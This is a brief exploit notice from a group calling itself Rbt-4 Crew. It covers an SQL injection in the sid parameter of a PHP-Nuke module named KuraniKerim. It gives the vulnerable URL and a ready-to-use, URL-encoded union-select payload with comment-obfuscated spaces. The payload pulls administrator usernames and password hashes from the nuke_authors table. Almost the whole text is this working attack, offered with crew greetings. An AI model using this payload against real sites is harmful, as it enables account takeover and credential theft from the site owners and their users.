Author : Lovebug    Italy   Rbt-4 Crew  
           
               www.rbt-4.net
 


 PHP-Nuke Module KuraniKerim [sid] SQL Injection 


Bug : modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid = [S Q L] 


 Exploit :-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

special tnx to:  Rbt-4 crew &  wishes for Robo